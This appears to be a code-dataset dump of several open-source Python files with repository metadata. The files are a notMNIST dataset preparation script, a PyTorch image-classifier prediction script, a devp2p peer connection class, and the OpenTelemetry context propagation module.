6a1501d572a47250fb79ebd30d23104a3301cddd
| 8,925
|
py
|
Python
|
not_mnist/src/setup.py
|
srungta/mnist-and-others
|
829993d85a9090c0036331bcf12195c815447946
|
[
"MIT"
] | null | null | null |
not_mnist/src/setup.py
|
srungta/mnist-and-others
|
829993d85a9090c0036331bcf12195c815447946
|
[
"MIT"
] | null | null | null |
not_mnist/src/setup.py
|
srungta/mnist-and-others
|
829993d85a9090c0036331bcf12195c815447946
|
[
"MIT"
] | null | null | null |
# imports
from __future__ import print_function
from IPython.display import display, Image
from six.moves import cPickle as pickle
from six.moves.urllib.request import urlretrieve
from sklearn.linear_model import LogisticRegression
import imageio
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
import tarfile
from constants import *
from commonconstants import NOT_MNIST_ZIPS_DIR, NOT_MNIST_IMAGES_DIR, NOT_MNIST_PICKLES_DIR
from file_helper import get_file_name, join_paths
np.random.seed(NUMPY_SEED)
last_percent_reported = None
def download_progress_hook(count, blockSize, totalSize):
"""A hook to report the progress of a download. This is mostly intended for users with
slow internet connections. Reports every 5% change in download progress.
"""
global last_percent_reported
percent = int(count*blockSize*100 / totalSize)
if last_percent_reported != percent:
if percent % 5 == 0:
sys.stdout.write('%s%%' % percent)
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
last_percent_reported = percent
def load_letter(folder, min_num_images):
"""Load the data for a single letter label."""
image_files = os.listdir(folder)
dataset = np.ndarray(shape=(len(image_files), IMAGE_SIZE, IMAGE_SIZE),
dtype=np.float32)
print(folder)
num_images = 0
for image in image_files:
image_file = os.path.join(folder, image)
try:
image_data = (imageio.imread(image_file).astype(float) -
PIXEl_DEPTh / 2) / PIXEl_DEPTh
if image_data.shape != (IMAGE_SIZE, IMAGE_SIZE):
raise Exception('Unexpected image shape: %s' %
str(image_data.shape))
dataset[num_images, :, :] = image_data
num_images = num_images + 1
except (IOError, ValueError) as e:
print('Could not read:', image_file,
':', e, '- it\'s ok, skipping.')
dataset = dataset[0:num_images, :, :]
if num_images < min_num_images:
raise Exception('Many fewer images than expected: %d < %d' %
(num_images, min_num_images))
print('Full dataset tensor:', dataset.shape)
print('Mean:', np.mean(dataset))
print('Standard deviation:', np.std(dataset))
return dataset
if __name__ == '__main__':
# Large
main(TRAINING_SIZE, VALIDATION_SIZE, TEST_SIZE, FINAL_DATASET_FILENAME)
# Small
main(TRAINING_SIZE_SMALL, VALIDATION_SIZE_SMALL, TEST_SIZE_SMALL, FINAL_DATASET_FILENAME_SMALL)
| 38.469828
| 99
| 0.662073
|
# imports
from __future__ import print_function
from IPython.display import display, Image
from six.moves import cPickle as pickle
from six.moves.urllib.request import urlretrieve
from sklearn.linear_model import LogisticRegression
import imageio
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
import tarfile
from constants import *
from commonconstants import NOT_MNIST_ZIPS_DIR, NOT_MNIST_IMAGES_DIR, NOT_MNIST_PICKLES_DIR
from file_helper import get_file_name, join_paths
np.random.seed(NUMPY_SEED)
last_percent_reported = None
def download_progress_hook(count, blockSize, totalSize):
"""A hook to report the progress of a download. This is mostly intended for users with
slow internet connections. Reports every 5% change in download progress.
"""
global last_percent_reported
percent = int(count*blockSize*100 / totalSize)
if last_percent_reported != percent:
if percent % 5 == 0:
sys.stdout.write('%s%%' % percent)
sys.stdout.flush()
else:
sys.stdout.write('.')
sys.stdout.flush()
last_percent_reported = percent
def maybe_download(filename, expected_bytes, force=False):
dest_filename = os.path.join(NOT_MNIST_ZIPS_DIR, filename)
if force or not os.path.exists(dest_filename):
print('Attempting to download:', filename)
filename, _ = urlretrieve(
DATASET_DOWNLOAD_URL + filename, dest_filename, reporthook=download_progress_hook)
print('\nDownload complete!')
statinfo = os.stat(dest_filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', dest_filename)
else:
raise Exception(
'Failed to verify ' + dest_filename + '. Get using abrowser.'
)
return dest_filename
def maybe_extract(filename, force=False):
root = os.path.splitext(os.path.splitext(get_file_name(filename))[0])[0] # remove .tar.gz
root = join_paths(NOT_MNIST_IMAGES_DIR, root)
if os.path.isdir(root) and not force:
# You may override by setting force=True.
print('%s already present - Skipping extraction of %s.' %
(root, filename))
else:
print('Extracting data for %s. This may take a while. Please wait.' % root)
tar = tarfile.open(filename)
sys.stdout.flush()
tar.extractall(NOT_MNIST_IMAGES_DIR)
tar.close()
data_folders = [
os.path.join(root, d) for d in sorted(os.listdir(root))
if os.path.isdir(os.path.join(root, d))]
if len(data_folders) != NUM_OF_CLASSES:
raise Exception(
'Expected %d folders, one per class. Found %d instead.' % (
NUM_OF_CLASSES, len(data_folders)))
print(data_folders)
return data_folders
def load_letter(folder, min_num_images):
"""Load the data for a single letter label."""
image_files = os.listdir(folder)
dataset = np.ndarray(shape=(len(image_files), IMAGE_SIZE, IMAGE_SIZE),
dtype=np.float32)
print(folder)
num_images = 0
for image in image_files:
image_file = os.path.join(folder, image)
try:
image_data = (imageio.imread(image_file).astype(float) -
PIXEl_DEPTh / 2) / PIXEl_DEPTh
if image_data.shape != (IMAGE_SIZE, IMAGE_SIZE):
raise Exception('Unexpected image shape: %s' %
str(image_data.shape))
dataset[num_images, :, :] = image_data
num_images = num_images + 1
except (IOError, ValueError) as e:
print('Could not read:', image_file,
':', e, '- it\'s ok, skipping.')
dataset = dataset[0:num_images, :, :]
if num_images < min_num_images:
raise Exception('Many fewer images than expected: %d < %d' %
(num_images, min_num_images))
print('Full dataset tensor:', dataset.shape)
print('Mean:', np.mean(dataset))
print('Standard deviation:', np.std(dataset))
return dataset
def maybe_pickle(data_folders, min_num_images_per_class, force=False):
dataset_names = []
for folder in data_folders:
set_filename = folder + '.pickle'
dataset_names.append(set_filename)
if os.path.exists(set_filename) and not force:
# You may override by setting force=True.
print('%s already present - Skipping pickling.' % set_filename)
else:
print('Pickling %s.' % set_filename)
dataset = load_letter(folder, min_num_images_per_class)
try:
with open(set_filename, 'wb') as f:
pickle.dump(dataset, f, pickle.HIGHEST_PROTOCOL)
except Exception as e:
print('Unable to save data to', set_filename, ':', e)
return dataset_names
def make_arrays(nb_rows, img_size):
if nb_rows:
dataset = np.ndarray((nb_rows, img_size, img_size), dtype=np.float32)
labels = np.ndarray(nb_rows, dtype=np.int32)
else:
dataset, labels = None, None
return dataset, labels
def merge_datasets(pickle_files, train_size, valid_size=0):
NUM_OF_CLASSES = len(pickle_files)
valid_dataset, valid_labels = make_arrays(valid_size, IMAGE_SIZE)
train_dataset, train_labels = make_arrays(train_size, IMAGE_SIZE)
vsize_per_class = valid_size // NUM_OF_CLASSES
tsize_per_class = train_size // NUM_OF_CLASSES
start_v, start_t = 0, 0
end_v, end_t = vsize_per_class, tsize_per_class
end_l = vsize_per_class+tsize_per_class
for label, pickle_file in enumerate(pickle_files):
try:
with open(pickle_file, 'rb') as f:
letter_set = pickle.load(f)
# let's shuffle the letters to have random validation and training set
np.random.shuffle(letter_set)
if valid_dataset is not None:
valid_letter = letter_set[:vsize_per_class, :, :]
valid_dataset[start_v:end_v, :, :] = valid_letter
valid_labels[start_v:end_v] = label
start_v += vsize_per_class
end_v += vsize_per_class
train_letter = letter_set[vsize_per_class:end_l, :, :]
train_dataset[start_t:end_t, :, :] = train_letter
train_labels[start_t:end_t] = label
start_t += tsize_per_class
end_t += tsize_per_class
except Exception as e:
print('Unable to process data from', pickle_file, ':', e)
raise
return valid_dataset, valid_labels, train_dataset, train_labels
def get_dataset_filenames():
train_filename = maybe_download(NOT_MNIST_FILENAME_LARGE, 247336696)
test_filename = maybe_download(NOT_MNIST_FILENAME_SMALL, 8458043)
train_folders = maybe_extract(train_filename)
test_folders = maybe_extract(test_filename)
train_datasets = maybe_pickle(
train_folders, MINIMUM_TRAIN_SAMPLES_PER_CLASS)
test_datasets = maybe_pickle(test_folders, MINIMUM_TEST_SAMPLES_PER_CLASS)
return train_datasets, test_datasets
def randomize(dataset, labels):
permutation = np.random.permutation(labels.shape[0])
shuffled_dataset = dataset[permutation, :, :]
shuffled_labels = labels[permutation]
return shuffled_dataset, shuffled_labels
def main(train_size, valid_size, test_size, filename):
train_datasets, test_datasets = get_dataset_filenames()
valid_dataset, valid_labels, train_dataset, train_labels = merge_datasets(
train_datasets, train_size, valid_size)
_, _, test_dataset, test_labels = merge_datasets(test_datasets, test_size)
print('Training:', train_dataset.shape, train_labels.shape)
print('Validation:', valid_dataset.shape, valid_labels.shape)
print('Testing:', test_dataset.shape, test_labels.shape)
train_dataset, train_labels = randomize(train_dataset, train_labels)
test_dataset, test_labels = randomize(test_dataset, test_labels)
valid_dataset, valid_labels = randomize(valid_dataset, valid_labels)
pickle_file = os.path.join(NOT_MNIST_PICKLES_DIR, filename)
try:
f = open(pickle_file, 'wb')
save = {
'train_dataset': train_dataset,
'train_labels': train_labels,
'valid_dataset': valid_dataset,
'valid_labels': valid_labels,
'test_dataset': test_dataset,
'test_labels': test_labels,
}
pickle.dump(save, f, pickle.HIGHEST_PROTOCOL)
f.close()
except Exception as e:
print('Unable to save data to', pickle_file, ':', e)
raise
if __name__ == '__main__':
# Large
main(TRAINING_SIZE, VALIDATION_SIZE, TEST_SIZE, FINAL_DATASET_FILENAME)
# Small
main(TRAINING_SIZE_SMALL, VALIDATION_SIZE_SMALL, TEST_SIZE_SMALL, FINAL_DATASET_FILENAME_SMALL)
| 6,077
| 0
| 184
|
b6e2e662897fd5cdcc07c0f014fc63ad8afe8445
| 69
|
py
|
Python
|
pyex_pkg/pyex_pkg/module2.py
|
uiuc-bioinf-club/cheetSheets
|
537f85debfb3d98cd718963721b87a255913161b
|
[
"MIT"
] | null | null | null |
pyex_pkg/pyex_pkg/module2.py
|
uiuc-bioinf-club/cheetSheets
|
537f85debfb3d98cd718963721b87a255913161b
|
[
"MIT"
] | null | null | null |
pyex_pkg/pyex_pkg/module2.py
|
uiuc-bioinf-club/cheetSheets
|
537f85debfb3d98cd718963721b87a255913161b
|
[
"MIT"
] | 2
|
2019-02-18T23:18:31.000Z
|
2021-07-21T19:23:58.000Z
|
from module1 import func1
print("imported module2")
print(func1(2))
| 13.8
| 25
| 0.768116
|
from module1 import func1
print("imported module2")
print(func1(2))
| 0
| 0
| 0
|
249ce9f8a32de5d0f4e4b2826835c85645008e06
| 3,910
|
py
|
Python
|
predict.py
|
johirbuet/Image-Classifier
|
9cfd78696940ebc40725f15d18133d0db6102035
|
[
"MIT"
] | null | null | null |
predict.py
|
johirbuet/Image-Classifier
|
9cfd78696940ebc40725f15d18133d0db6102035
|
[
"MIT"
] | null | null | null |
predict.py
|
johirbuet/Image-Classifier
|
9cfd78696940ebc40725f15d18133d0db6102035
|
[
"MIT"
] | null | null | null |
import argparse
import json
import torch
from torch import nn
from torch.autograd import Variable
from torchvision import models
from collections import OrderedDict
from PIL import Image
import numpy as np
import numbers
if __name__ == "__main__":
main()
| 31.28
| 87
| 0.61509
|
import argparse
import json
import torch
from torch import nn
from torch.autograd import Variable
from torchvision import models
from collections import OrderedDict
from PIL import Image
import numpy as np
import numbers
def load_checkpoint(path):
checkpoint = torch.load(path)
arch = checkpoint['arch']
hidden_units = checkpoint['hidden_units']
if arch == "vgg13":
model = models.vgg13()
else:
model = models.densenet121()
if isinstance(hidden_units, numbers.Integral):
classifier = nn.Sequential(OrderedDict(
[
('fc1', nn.Linear(1024, hidden_units)),
('relu', nn.ReLU()),
('fc2', nn.Linear(hidden_units, 102)),
('output', nn.LogSoftmax(dim=1))
]))
model.classifier = classifier
else:
d = OrderedDict()
layers = []
i = 1
prev = 1024
for j in range(0,len(hidden_units) -1):
hi = hidden_units[j]
layers.append(('fc'+i, nn.Linear(prev, hi)))
layers.append(('relu'+i, nn.ReLU()))
prev = hi
i = i + 1
layers.append(('fc'+i, nn.Linear(prev, hidden_units[len(hidden_units) - 1])))
layers.append(('output', nn.LogSoftmax(dim=1)))
classifier = nn.Sequential(OrderedDict(layers))
model.classifier = classifier
model.load_state_dict(checkpoint['state_dict'])
class_to_idx = checkpoint['class_to_idx']
idx_to_class = {i: k for k, i in class_to_idx.items()}
return model, class_to_idx, idx_to_class
def process_image(image):
size = 256, 256
image.thumbnail(size, Image.ANTIALIAS)
image = image.crop((
size[0] // 2 - (224 / 2),
size[1] // 2 - (224 / 2),
size[0] // 2 + (224 / 2),
size[1] // 2 + (224 / 2))
)
np_image = np.array(image) / 255
np_image[:, :, 0] = (np_image[:, :, 0] - 0.485) / (0.229)
np_image[:, :, 1] = (np_image[:, :, 1] - 0.456) / (0.224)
np_image[:, :, 2] = (np_image[:, :, 2] - 0.406) / (0.225)
np_image = np.transpose(np_image, (2, 0, 1))
return np_image
def predict(image_path, model, idx_to_class, cat_to_name, topk, gpu):
if gpu and torch.cuda.is_available():
model.cuda()
image = process_image(Image.open(image_path))
image = torch.FloatTensor([image])
model.eval()
if gpu and torch.cuda.is_available():
inputs = Variable(image.cuda())
else:
inputs = Variable(image)
output = model.forward(inputs)
ps = torch.exp(output).data.cpu().numpy()[0]
topk_index = np.argsort(ps)[-topk:][::-1]
topk_class = [idx_to_class[x] for x in topk_index]
named_topk_class = [cat_to_name[x] for x in topk_class]
topk_prob = ps[topk_index]
return topk_prob, named_topk_class
def label_mapping(cat_to_name):
with open(cat_to_name, 'r') as f:
return json.load(f)
def main():
parser = argparse.ArgumentParser(description='Predict flower types')
parser.add_argument('--gpu', action='store_true', help='Using GPU or not')
parser.add_argument('input', type=str, help='Path to image that will be predicted')
parser.add_argument('checkpoint', type=str, help='Path to training checkpoint')
parser.add_argument('--category_names', type=str, default='cat_to_name.json',
help='Path to category to flower name mapping json')
parser.add_argument('--topk', type=int, default=5, help='Top k probabilities')
args = parser.parse_args()
cat_to_name = label_mapping(args.category_names)
model, class_to_idx, idx_to_class = load_checkpoint(args.checkpoint)
topk_prob, named_topk_class = predict(args.input, model, idx_to_class,
cat_to_name, args.topk, args.gpu)
print(dict(zip(named_topk_class, topk_prob)))
if __name__ == "__main__":
main()
| 3,530
| 0
| 115
|
32ae876b42b6bb362bf46f31ffcb82c4faec760d
| 10,325
|
py
|
Python
|
devp2p/peer.py
|
vaporyproject/pydevp2p
|
084d58bd98e1573ccce82fbb766ff06fb6831fe4
|
[
"MIT"
] | null | null | null |
devp2p/peer.py
|
vaporyproject/pydevp2p
|
084d58bd98e1573ccce82fbb766ff06fb6831fe4
|
[
"MIT"
] | null | null | null |
devp2p/peer.py
|
vaporyproject/pydevp2p
|
084d58bd98e1573ccce82fbb766ff06fb6831fe4
|
[
"MIT"
] | null | null | null |
import time
import gevent
import operator
from collections import OrderedDict
from protocol import BaseProtocol
from p2p_protocol import P2PProtocol
from service import WiredService
import multiplexer
from muxsession import MultiplexedSession
from crypto import ECIESDecryptionError
import slogging
import gevent.socket
import rlpxcipher
log = slogging.get_logger('p2p.peer')
class UnknownCommandError(Exception):
"raised if we recive an unknown command for a known protocol"
pass
| 39.408397
| 99
| 0.613462
|
import time
import gevent
import operator
from collections import OrderedDict
from protocol import BaseProtocol
from p2p_protocol import P2PProtocol
from service import WiredService
import multiplexer
from muxsession import MultiplexedSession
from crypto import ECIESDecryptionError
import slogging
import gevent.socket
import rlpxcipher
log = slogging.get_logger('p2p.peer')
class UnknownCommandError(Exception):
"raised if we recive an unknown command for a known protocol"
pass
class Peer(gevent.Greenlet):
remote_client_version = ''
wait_read_timeout = 0.001
def __init__(self, peermanager, connection, remote_pubkey=None): # FIXME node vs remote_pubkey
super(Peer, self).__init__()
self.is_stopped = False
self.peermanager = peermanager
self.connection = connection
self.config = peermanager.config
self.protocols = OrderedDict()
log.debug('peer init', peer=self)
# create multiplexed encrypted session
privkey = self.config['node']['privkey_hex'].decode('hex')
hello_packet = P2PProtocol.get_hello_packet(self)
self.mux = MultiplexedSession(privkey, hello_packet,
token_by_pubkey=dict(), remote_pubkey=remote_pubkey)
# register p2p protocol
assert issubclass(self.peermanager.wire_protocol, P2PProtocol)
self.connect_service(self.peermanager)
# assure, we don't get messages while replies are not read
self.safe_to_read = gevent.event.Event()
self.safe_to_read.set()
@property
def remote_pubkey(self):
"if peer is responder, then the remote_pubkey will not be available"
"before the first packet is received"
return self.mux.remote_pubkey
def __repr__(self):
try:
pn = self.connection.getpeername()
except gevent.socket.error:
pn = ('not ready',)
try:
cv = '/'.join(self.remote_client_version.split('/')[:2])
except:
cv = self.remote_client_version
return '<Peer%r %s>' % (pn, cv)
# return '<Peer%r>' % repr(pn)
def report_error(self, reason):
try:
ip_port = self.ip_port
except:
ip_port = 'ip_port not available fixme'
self.peermanager.errors.add(ip_port, reason, self.remote_client_version)
@property
def ip_port(self):
try:
return self.connection.getpeername()
except Exception as e:
log.debug('ip_port failed')
raise e
def connect_service(self, service):
assert isinstance(service, WiredService)
protocol_class = service.wire_protocol
assert issubclass(protocol_class, BaseProtocol)
# create protcol instance which connects peer with serivce
protocol = protocol_class(self, service)
# register protocol
assert protocol_class not in self.protocols
log.debug('registering protocol', protocol=protocol.name, peer=self)
self.protocols[protocol_class] = protocol
self.mux.add_protocol(protocol.protocol_id)
protocol.start()
def has_protocol(self, protocol):
assert issubclass(protocol, BaseProtocol)
return protocol in self.protocols
def receive_hello(self, proto, version, client_version, capabilities, listen_port, nodeid):
# register in common protocols
log.info('received hello', version=version,
client_version=client_version, capabilities=capabilities)
self.remote_client_version = client_version
# call peermanager
agree = self.peermanager.on_hello_received(
proto, version, client_version, capabilities, listen_port, nodeid)
if not agree:
return
log.debug('connecting services', services=self.peermanager.wired_services)
remote_services = dict((name, version) for name, version in capabilities)
for service in sorted(self.peermanager.wired_services, key=operator.attrgetter('name')):
proto = service.wire_protocol
assert isinstance(service, WiredService)
if proto.name in remote_services:
if remote_services[proto.name] == proto.version:
if service != self.peermanager: # p2p protcol already registered
self.connect_service(service)
else:
log.debug('wrong version', service=proto.name, local_version=proto.version,
remote_version=remote_services[proto.name])
self.report_error('wrong version')
@property
def capabilities(self):
return [(s.wire_protocol.name, s.wire_protocol.version)
for s in self.peermanager.wired_services]
# sending p2p messages
def send_packet(self, packet):
# rewrite cmd id / future FIXME to packet.protocol_id
for i, protocol in enumerate(self.protocols.values()):
if packet.protocol_id == protocol.protocol_id:
break
assert packet.protocol_id == protocol.protocol_id, 'no protocol found'
log.debug('send packet', cmd=protocol.cmd_by_id[packet.cmd_id], protcol=protocol.name,
peer=self)
# rewrite cmd_id # FIXME
for i, protocol in enumerate(self.protocols.values()):
if packet.protocol_id > i:
packet.cmd_id += (0 if protocol.max_cmd_id == 0 else protocol.max_cmd_id + 1)
if packet.protocol_id == protocol.protocol_id:
break
packet.protocol_id = 0
# done rewrite
self.mux.add_packet(packet)
# receiving p2p messages
def protocol_cmd_id_from_packet(self, packet):
# packet.protocol_id not yet used. old adaptive cmd_ids instead
# future FIXME to packet.protocol_id
# get protocol and protocol.cmd_id from packet.cmd_id
max_id = 0
assert packet.protocol_id == 0 # FIXME, should be used by other peers
for protocol in self.protocols.values():
if packet.cmd_id < max_id + protocol.max_cmd_id + 1:
return protocol, packet.cmd_id - (0 if max_id == 0 else max_id + 1)
max_id += protocol.max_cmd_id
raise UnknownCommandError('no protocol for id %s' % packet.cmd_id)
def _handle_packet(self, packet):
assert isinstance(packet, multiplexer.Packet)
try:
protocol, cmd_id = self.protocol_cmd_id_from_packet(packet)
except UnknownCommandError, e:
log.error('received unknown cmd', error=e, packet=packet)
return
log.debug('recv packet', cmd=protocol.cmd_by_id[
cmd_id], protocol=protocol.name, orig_cmd_id=packet.cmd_id)
packet.cmd_id = cmd_id # rewrite
protocol.receive_packet(packet)
def send(self, data):
if not data:
return
self.safe_to_read.clear() # make sure we don't accept any data until message is sent
try:
self.connection.sendall(data) # check if gevent chunkes and switches contexts
log.debug('wrote data', size=len(data), ts=time.time())
except gevent.socket.error as e:
log.debug('write error', errno=e.errno, reason=e.strerror)
self.report_error('write error %r' % e.strerror)
self.stop()
except gevent.socket.timeout:
log.debug('write timeout')
self.report_error('write timeout')
self.stop()
self.safe_to_read.set()
def _run_egress_message(self):
while not self.is_stopped:
self.send(self.mux.message_queue.get())
def _run_decoded_packets(self):
# handle decoded packets
while not self.is_stopped:
self._handle_packet(self.mux.packet_queue.get()) # get_packet blocks
def _run_ingress_message(self):
log.debug('peer starting main loop')
assert not self.connection.closed, "connection is closed"
gevent.spawn(self._run_decoded_packets)
gevent.spawn(self._run_egress_message)
while not self.is_stopped:
self.safe_to_read.wait()
try:
gevent.socket.wait_read(self.connection.fileno())
except gevent.socket.error as e:
log.debug('read error', errno=e.errno, reason=e.strerror, peer=self)
self.report_error('network error %s' % e.strerror)
if e.errno in(9,):
# ('Bad file descriptor')
self.stop()
else:
raise e
break
try:
imsg = self.connection.recv(4096)
except gevent.socket.error as e:
log.debug('read error', errno=e.errno, reason=e.strerror, peer=self)
self.report_error('network error %s' % e.strerror)
if e.errno in(50, 54, 60, 65):
# (Network down, Connection reset by peer, timeout, nor route to host)
self.stop()
else:
raise e
break
if imsg:
log.debug('read message', ts=time.time(), size=len(imsg))
try:
self.mux.add_message(imsg)
except (rlpxcipher.RLPxSessionError, ECIESDecryptionError) as e:
log.debug('rlpx session error', peer=self, error=e)
self.report_error('rlpx session error')
self.stop()
except multiplexer.MultiplexerError as e:
log.debug('multiplexer error', peer=self, error=e)
self.report_error('multiplexer error')
self.stop()
else:
log.debug('no data on socket', peer=self)
self.report_error('no data on socket')
self.stop()
_run = _run_ingress_message
def stop(self):
if not self.is_stopped:
self.is_stopped = True
log.debug('stopped', peer=self)
for p in self.protocols.values():
p.stop()
self.peermanager.peers.remove(self)
self.kill()
| 8,985
| 825
| 23
|
6050b5f4ff89903ef691871454833dc5d07ce689
| 5,340
|
py
|
Python
|
opentelemetry-api/src/opentelemetry/propagate/__init__.py
|
toumorokoshi/opentelemetry-python
|
03c6b7391d16236ad5d4e48b0cb0bff786c2e583
|
[
"Apache-2.0"
] | 1
|
2021-02-26T02:37:54.000Z
|
2021-02-26T02:37:54.000Z
|
opentelemetry-api/src/opentelemetry/propagate/__init__.py
|
jini-lee/opentelemetry-python
|
99128b35d1a9cf2ecb04097c6a87d320a552a3e4
|
[
"Apache-2.0"
] | 1
|
2020-11-18T17:44:08.000Z
|
2020-11-18T17:46:17.000Z
|
opentelemetry-api/src/opentelemetry/propagate/__init__.py
|
jini-lee/opentelemetry-python
|
99128b35d1a9cf2ecb04097c6a87d320a552a3e4
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
API for propagation of context.
The propagators for the
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` can be defined
via configuration in the ``OTEL_PROPAGATORS`` environment variable. This
variable should be set to a comma-separated string of names of values for the
``opentelemetry_propagator`` entry point. For example, setting
``OTEL_PROPAGATORS`` to ``tracecontext,baggage`` (which is the default value)
would instantiate
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` with 2
propagators, one of type
``opentelemetry.trace.propagation.tracecontext.TraceContextTextMapPropagator``
and other of type ``opentelemetry.baggage.propagation.BaggagePropagator``.
Notice that these propagator classes are defined as
``opentelemetry_propagator`` entry points in the ``setup.cfg`` file of
``opentelemetry``.
Example::
import flask
import requests
from opentelemetry import propagators
PROPAGATOR = propagators.get_global_textmap()
def get_header_from_flask_request(request, key):
return request.headers.get_all(key)
def set_header_into_requests_request(request: requests.Request,
key: str, value: str):
request.headers[key] = value
def example_route():
context = PROPAGATOR.extract(
get_header_from_flask_request,
flask.request
)
request_to_downstream = requests.Request(
"GET", "http://httpbin.org/get"
)
PROPAGATOR.inject(
set_header_into_requests_request,
request_to_downstream,
context=context
)
session = requests.Session()
session.send(request_to_downstream.prepare())
.. _Propagation API Specification:
https://github.com/open-telemetry/opentelemetry-specification/blob/main/specification/context/api-propagators.md
"""
import typing
from logging import getLogger
from os import environ
from pkg_resources import iter_entry_points
from opentelemetry.context.context import Context
from opentelemetry.environment_variables import OTEL_PROPAGATORS
from opentelemetry.propagators import composite
from opentelemetry.trace.propagation import textmap
logger = getLogger(__name__)
def extract(
getter: textmap.Getter[textmap.TextMapPropagatorT],
carrier: textmap.TextMapPropagatorT,
context: typing.Optional[Context] = None,
) -> Context:
"""Uses the configured propagator to extract a Context from the carrier.
Args:
getter: an object which contains a get function that can retrieve zero
or more values from the carrier and a keys function that can get all the keys
from carrier.
carrier: and object which contains values that are
used to construct a Context. This object
must be paired with an appropriate getter
which understands how to extract a value from it.
context: an optional Context to use. Defaults to current
context if not set.
"""
return get_global_textmap().extract(getter, carrier, context)
def inject(
set_in_carrier: textmap.Setter[textmap.TextMapPropagatorT],
carrier: textmap.TextMapPropagatorT,
context: typing.Optional[Context] = None,
) -> None:
"""Uses the configured propagator to inject a Context into the carrier.
Args:
set_in_carrier: A setter function that can set values
on the carrier.
carrier: An object that contains a representation of HTTP
headers. Should be paired with set_in_carrier, which
should know how to set header values on the carrier.
context: an optional Context to use. Defaults to current
context if not set.
"""
get_global_textmap().inject(set_in_carrier, carrier, context)
try:
propagators = []
# Single use variable here to hack black and make lint pass
environ_propagators = environ.get(
OTEL_PROPAGATORS, "tracecontext,baggage",
)
for propagator in environ_propagators.split(","):
propagators.append( # type: ignore
next( # type: ignore
iter_entry_points("opentelemetry_propagator", propagator)
).load()()
)
except Exception: # pylint: disable=broad-except
logger.exception("Failed to load configured propagators")
raise
_HTTP_TEXT_FORMAT = composite.CompositeHTTPPropagator(propagators) # type: ignore
| 34.451613
| 116
| 0.720412
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
API for propagation of context.
The propagators for the
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` can be defined
via configuration in the ``OTEL_PROPAGATORS`` environment variable. This
variable should be set to a comma-separated string of names of values for the
``opentelemetry_propagator`` entry point. For example, setting
``OTEL_PROPAGATORS`` to ``tracecontext,baggage`` (which is the default value)
would instantiate
``opentelemetry.propagators.composite.CompositeHTTPPropagator`` with 2
propagators, one of type
``opentelemetry.trace.propagation.tracecontext.TraceContextTextMapPropagator``
and other of type ``opentelemetry.baggage.propagation.BaggagePropagator``.
Notice that these propagator classes are defined as
``opentelemetry_propagator`` entry points in the ``setup.cfg`` file of
``opentelemetry``.
Example::
import flask
import requests
from opentelemetry import propagators
PROPAGATOR = propagators.get_global_textmap()
def get_header_from_flask_request(request, key):
return request.headers.get_all(key)
def set_header_into_requests_request(request: requests.Request,
key: str, value: str):
request.headers[key] = value
def example_route():
context = PROPAGATOR.extract(
get_header_from_flask_request,
flask.request
)
request_to_downstream = requests.Request(
"GET", "http://httpbin.org/get"
)
PROPAGATOR.inject(
set_header_into_requests_request,
request_to_downstream,
context=context
)
session = requests.Session()
session.send(request_to_downstream.prepare())
.. _Propagation API Specification:
https://github.com/open-telemetry/opentelemetry-specification/blob/main/specification/context/api-propagators.md
"""
import typing
from logging import getLogger
from os import environ
from pkg_resources import iter_entry_points
from opentelemetry.context.context import Context
from opentelemetry.environment_variables import OTEL_PROPAGATORS
from opentelemetry.propagators import composite
from opentelemetry.trace.propagation import textmap
logger = getLogger(__name__)
def extract(
getter: textmap.Getter[textmap.TextMapPropagatorT],
carrier: textmap.TextMapPropagatorT,
context: typing.Optional[Context] = None,
) -> Context:
"""Uses the configured propagator to extract a Context from the carrier.
Args:
getter: an object which contains a get function that can retrieve zero
or more values from the carrier and a keys function that can get all the keys
from carrier.
carrier: and object which contains values that are
used to construct a Context. This object
must be paired with an appropriate getter
which understands how to extract a value from it.
context: an optional Context to use. Defaults to current
context if not set.
"""
return get_global_textmap().extract(getter, carrier, context)
def inject(
set_in_carrier: textmap.Setter[textmap.TextMapPropagatorT],
carrier: textmap.TextMapPropagatorT,
context: typing.Optional[Context] = None,
) -> None:
"""Uses the configured propagator to inject a Context into the carrier.
Args:
set_in_carrier: A setter function that can set values
on the carrier.
carrier: An object that contains a representation of HTTP
headers. Should be paired with set_in_carrier, which
should know how to set header values on the carrier.
context: an optional Context to use. Defaults to current
context if not set.
"""
get_global_textmap().inject(set_in_carrier, carrier, context)
try:
propagators = []
# Single use variable here to hack black and make lint pass
environ_propagators = environ.get(
OTEL_PROPAGATORS, "tracecontext,baggage",
)
for propagator in environ_propagators.split(","):
propagators.append( # type: ignore
next( # type: ignore
iter_entry_points("opentelemetry_propagator", propagator)
).load()()
)
except Exception: # pylint: disable=broad-except
logger.exception("Failed to load configured propagators")
raise
_HTTP_TEXT_FORMAT = composite.CompositeHTTPPropagator(propagators) # type: ignore
def get_global_textmap() -> textmap.TextMapPropagator:
return _HTTP_TEXT_FORMAT
def set_global_textmap(http_text_format: textmap.TextMapPropagator,) -> None:
global _HTTP_TEXT_FORMAT # pylint:disable=global-statement
_HTTP_TEXT_FORMAT = http_text_format # type: ignore
| 239
| 0
| 46
|
1043a523f50f48d4196a7df72c983eb7845b8ba5
| 4,272
|
py
|
Python
|
src/pyjen/plugins/buildblocker.py
|
TheFriendlyCoder/pyjen
|
a3d7e8f69cb53f80f627300f8d3aa0d4302a5ac1
|
[
"Apache-2.0"
] | 5
|
2017-12-14T13:39:04.000Z
|
